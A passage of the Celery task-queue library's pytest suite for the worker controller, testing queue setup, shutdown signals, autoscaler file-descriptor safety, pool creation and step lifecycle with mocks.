self.app.amqp.queues.select.side_effect = KeyError() self.app.amqp.queues.deselect.side_effect = KeyError() with pytest.raises(ImproperlyConfigured): self.worker.setup_queues('x,y', exclude='foo,bar') self.app.amqp.queues.select = Mock(name='select') with pytest.raises(ImproperlyConfigured): self.worker.setup_queues('x,y', exclude='foo,bar') def test_send_worker_shutdown(self): with patch('celery.signals.worker_shutdown') as ws: self.worker._send_worker_shutdown() ws.send.assert_called_with(sender=self.worker) @pytest.mark.skip('TODO: unstable test') def test_process_shutdown_on_worker_shutdown(self): from celery.concurrency.asynpool import Worker from celery.concurrency.prefork import process_destructor with patch('celery.signals.worker_process_shutdown') as ws: with patch('os._exit') as _exit: worker = Worker(None, None, on_exit=process_destructor) worker._do_exit(22, 3.1415926) ws.send.assert_called_with( sender=None, pid=22, exitcode=3.1415926, ) _exit.assert_called_with(3.1415926) def test_process_task_revoked_release_semaphore(self): self.worker._quick_release = Mock() req = Mock() req.execute_using_pool.side_effect = TaskRevokedError self.worker._process_task(req) self.worker._quick_release.assert_called_with() delattr(self.worker, '_quick_release') self.worker._process_task(req) def test_shutdown_no_blueprint(self): self.worker.blueprint = None self.worker._shutdown() @patch('celery.worker.worker.create_pidlock') def test_use_pidfile(self, create_pidlock): create_pidlock.return_value = Mock() worker = self.create_worker(pidfile='pidfilelockfilepid') worker.steps = [] worker.start() create_pidlock.assert_called() worker.stop() worker.pidlock.release.assert_called() def test_attrs(self): worker = self.worker assert worker.timer is not None assert isinstance(worker.timer, Timer) assert worker.pool is not None assert worker.consumer is not None assert worker.steps def test_with_embedded_beat(self): worker = self.app.WorkController(concurrency=1, loglevel=0, beat=True) assert worker.beat assert worker.beat in [w.obj for w in worker.steps] def test_with_autoscaler(self): worker = self.create_worker( autoscale=[10, 3], send_events=False, timer_cls='celery.utils.timer2.Timer', ) assert worker.autoscaler @t.skip.if_win32 @pytest.mark.sleepdeprived_patched_module(autoscale) def test_with_autoscaler_file_descriptor_safety(self, sleepdeprived): # Given: a test celery worker instance with auto scaling worker = self.create_worker( autoscale=[10, 5], use_eventloop=True, timer_cls='celery.utils.timer2.Timer', threads=False, ) # Given: This test requires a QoS defined on the worker consumer worker.consumer.qos = qos = QoS(lambda prefetch_count: prefetch_count, 2) qos.update() # Given: We have started the worker pool worker.pool.start() # Then: the worker pool is the same as the autoscaler pool auto_scaler = worker.autoscaler assert worker.pool == auto_scaler.pool # Given: Utilize kombu to get the global hub state hub = get_event_loop() # Given: Initial call the Async Pool to register events works fine worker.pool.register_with_event_loop(hub) # Create some mock queue message and read from them _keep = [Mock(name=f'req{i}') for i in range(20)] [state.task_reserved(m) for m in _keep] auto_scaler.body() # Simulate a file descriptor from the list is closed by the OS # auto_scaler.force_scale_down(5) # This actually works -- it releases the semaphore properly # Same with calling .terminate() on the process directly for fd, proc in worker.pool._pool._fileno_to_outq.items(): # however opening this fd as a file and closing it will do it queue_worker_socket = open(str(fd), "w") queue_worker_socket.close() break # Only need to do this once # When: Calling again to register with event loop ... worker.pool.register_with_event_loop(hub) # Then: test did not raise "OSError: [Errno 9] Bad file descriptor!" # Finally: Clean up so the threads before/after fixture passes worker.terminate() worker.pool.terminate() @t.skip.if_win32 @pytest.mark.sleepdeprived_patched_module(autoscale) def test_with_file_descriptor_safety(self, sleepdeprived): # Given: a test celery worker instance worker = self.create_worker( autoscale=[10, 5], use_eventloop=True, timer_cls='celery.utils.timer2.Timer', threads=False, ) # Given: This test requires a QoS defined on the worker consumer worker.consumer.qos = qos = QoS(lambda prefetch_count: prefetch_count, 2) qos.update() # Given: We have started the worker pool worker.pool.start() # Given: Utilize kombu to get the global hub state hub = get_event_loop() # Given: Initial call the Async Pool to register events works fine worker.pool.register_with_event_loop(hub) # Given: Mock the Hub to return errors for add and remove def throw_file_not_found_error(*args, **kwargs): raise OSError() hub.add = throw_file_not_found_error hub.add_reader = throw_file_not_found_error hub.remove = throw_file_not_found_error # When: Calling again to register with event loop ... worker.pool.register_with_event_loop(hub) worker.pool._pool.register_with_event_loop(hub) # Then: test did not raise OSError # Note: worker.pool is prefork.TaskPool whereas # worker.pool._pool is the asynpool.AsynPool class. # When: Calling the tic method on_poll_start worker.pool._pool.on_poll_start() # Then: test did not raise OSError # Given: a mock object that fakes what's required to do what's next proc = Mock(_sentinel_poll=42) # When: Calling again to register with event loop ... worker.pool._pool._track_child_process(proc, hub) # Then: test did not raise OSError # Given: worker.pool._pool._flush_outqueue = throw_file_not_found_error # Finally: Clean up so the threads before/after fixture passes worker.terminate() worker.pool.terminate() def test_dont_stop_or_terminate(self): worker = self.app.WorkController(concurrency=1, loglevel=0) worker.stop() assert worker.blueprint.state != CLOSE worker.terminate() assert worker.blueprint.state != CLOSE sigsafe, worker.pool.signal_safe = worker.pool.signal_safe, False try: worker.blueprint.state = RUN worker.stop(in_sighandler=True) assert worker.blueprint.state != CLOSE worker.terminate(in_sighandler=True) assert worker.blueprint.state != CLOSE finally: worker.pool.signal_safe = sigsafe def test_on_timer_error(self): worker = self.app.WorkController(concurrency=1, loglevel=0) try: raise KeyError('foo') except KeyError as exc: components.Timer(worker).on_timer_error(exc) msg, args = self.comp_logger.error.call_args[0] assert 'KeyError' in msg % args def test_on_timer_tick(self): worker = self.app.WorkController(concurrency=1, loglevel=10) components.Timer(worker).on_timer_tick(30.0) xargs = self.comp_logger.debug.call_args[0] fmt, arg = xargs[0], xargs[1] assert arg == 30.0 assert 'Next ETA %s secs' in fmt def test_process_task(self): worker = self.worker worker.pool = Mock() channel = Mock() m = self.create_task_message( channel, self.foo_task.name, args=[4, 8, 10], kwargs={}, ) task = Request(m, app=self.app) worker._process_task(task) assert worker.pool.apply_async.call_count == 1 worker.pool.stop() def test_process_task_raise_base(self): worker = self.worker worker.pool = Mock() worker.pool.apply_async.side_effect = KeyboardInterrupt('Ctrl+C') channel = Mock() m = self.create_task_message( channel, self.foo_task.name, args=[4, 8, 10], kwargs={}, ) task = Request(m, app=self.app) worker.steps = [] worker.blueprint.state = RUN with pytest.raises(KeyboardInterrupt): worker._process_task(task) def test_process_task_raise_WorkerTerminate(self): worker = self.worker worker.pool = Mock() worker.pool.apply_async.side_effect = WorkerTerminate() channel = Mock() m = self.create_task_message( channel, self.foo_task.name, args=[4, 8, 10], kwargs={}, ) task = Request(m, app=self.app) worker.steps = [] worker.blueprint.state = RUN with pytest.raises(SystemExit): worker._process_task(task) def test_process_task_raise_regular(self): worker = self.worker worker.pool = Mock() worker.pool.apply_async.side_effect = KeyError('some exception') channel = Mock() m = self.create_task_message( channel, self.foo_task.name, args=[4, 8, 10], kwargs={}, ) task = Request(m, app=self.app) with pytest.raises(KeyError): worker._process_task(task) worker.pool.stop() def test_start_catches_base_exceptions(self): worker1 = self.create_worker() worker1.blueprint.state = RUN stc = MockStep() stc.start.side_effect = WorkerTerminate() worker1.steps = [stc] worker1.start() stc.start.assert_called_with(worker1) assert stc.terminate.call_count worker2 = self.create_worker() worker2.blueprint.state = RUN sec = MockStep() sec.start.side_effect = WorkerShutdown() sec.terminate = None worker2.steps = [sec] worker2.start() assert sec.stop.call_count def test_statedb(self): from celery.worker import state Persistent = state.Persistent state.Persistent = Mock() try: worker = self.create_worker(statedb='statefilename') assert worker._persistence finally: state.Persistent = Persistent def test_process_task_sem(self): worker = self.worker worker._quick_acquire = Mock() req = Mock() worker._process_task_sem(req) worker._quick_acquire.assert_called_with(worker._process_task, req) def test_signal_consumer_close(self): worker = self.worker worker.consumer = Mock() worker.signal_consumer_close() worker.consumer.close.assert_called_with() worker.consumer.close.side_effect = AttributeError() worker.signal_consumer_close() def test_rusage__no_resource(self): from celery.worker import worker prev, worker.resource = worker.resource, None try: self.worker.pool = Mock(name='pool') with pytest.raises(NotImplementedError): self.worker.rusage() self.worker.stats() finally: worker.resource = prev def test_repr(self): assert repr(self.worker) def test_str(self): assert str(self.worker) == self.worker.hostname def test_start__stop(self): worker = self.worker worker.blueprint.shutdown_complete.set() worker.steps = [MockStep(StartStopStep(self)) for _ in range(4)] worker.blueprint.state = RUN worker.blueprint.started = 4 for w in worker.steps: w.start = Mock() w.close = Mock() w.stop = Mock() worker.start() for w in worker.steps: w.start.assert_called() worker.consumer = Mock() worker.stop(exitcode=3) for stopstep in worker.steps: stopstep.close.assert_called() stopstep.stop.assert_called() # Doesn't close pool if no pool. worker.start() worker.pool = None worker.stop() # test that stop of None is not attempted worker.steps[-1] = None worker.start() worker.stop() def test_start__KeyboardInterrupt(self): worker = self.worker worker.blueprint = Mock(name='blueprint') worker.blueprint.start.side_effect = KeyboardInterrupt() worker.stop = Mock(name='stop') worker.start() worker.stop.assert_called_with(exitcode=EX_FAILURE) def test_register_with_event_loop(self): worker = self.worker hub = Mock(name='hub') worker.blueprint = Mock(name='blueprint') worker.register_with_event_loop(hub) worker.blueprint.send_all.assert_called_with( worker, 'register_with_event_loop', args=(hub,), description='hub.register', ) def test_step_raises(self): worker = self.worker step = Mock() worker.steps = [step] step.start.side_effect = TypeError() worker.stop = Mock() worker.start() worker.stop.assert_called_with(exitcode=EX_FAILURE) def test_state(self): assert self.worker.state def test_start__terminate(self): worker = self.worker worker.blueprint.shutdown_complete.set() worker.blueprint.started = 5 worker.blueprint.state = RUN worker.steps = [MockStep() for _ in range(5)] worker.start() for w in worker.steps[:3]: w.start.assert_called() assert worker.blueprint.started == len(worker.steps) assert worker.blueprint.state == RUN worker.terminate() for step in worker.steps: step.terminate.assert_called() worker.blueprint.state = TERMINATE worker.terminate() def test_Hub_create(self): w = Mock() x = components.Hub(w) x.create(w) assert w.timer.max_interval def test_Pool_create_threaded(self): w = Mock() w._conninfo.connection_errors = w._conninfo.channel_errors = () w.pool_cls = Mock() w.use_eventloop = False pool = components.Pool(w) pool.create(w) def test_Pool_pool_no_sem(self): w = Mock() w.pool_cls.uses_semaphore = False components.Pool(w).create(w) assert w.process_task is w._process_task def test_Pool_create(self): from kombu.asynchronous.semaphore import LaxBoundedSemaphore w = Mock() w._conninfo.connection_errors = w._conninfo.channel_errors = () w.hub = Mock() PoolImp = Mock() poolimp = PoolImp.return_value = Mock() poolimp._pool = [Mock(), Mock()] poolimp._cache = {} poolimp._fileno_to_inq = {} poolimp._fileno_to_outq = {} from celery.concurrency.prefork import TaskPool as _TaskPool class MockTaskPool(_TaskPool): Pool = PoolImp @property def timers(self): return {Mock(): 30} w.pool_cls = MockTaskPool w.use_eventloop = True w.consumer.restart_count = -1 pool = components.Pool(w) pool.create(w) pool.register_with_event_loop(w, w.hub) if sys.platform != 'win32': assert isinstance(w.semaphore, LaxBoundedSemaphore) P = w.pool P.start()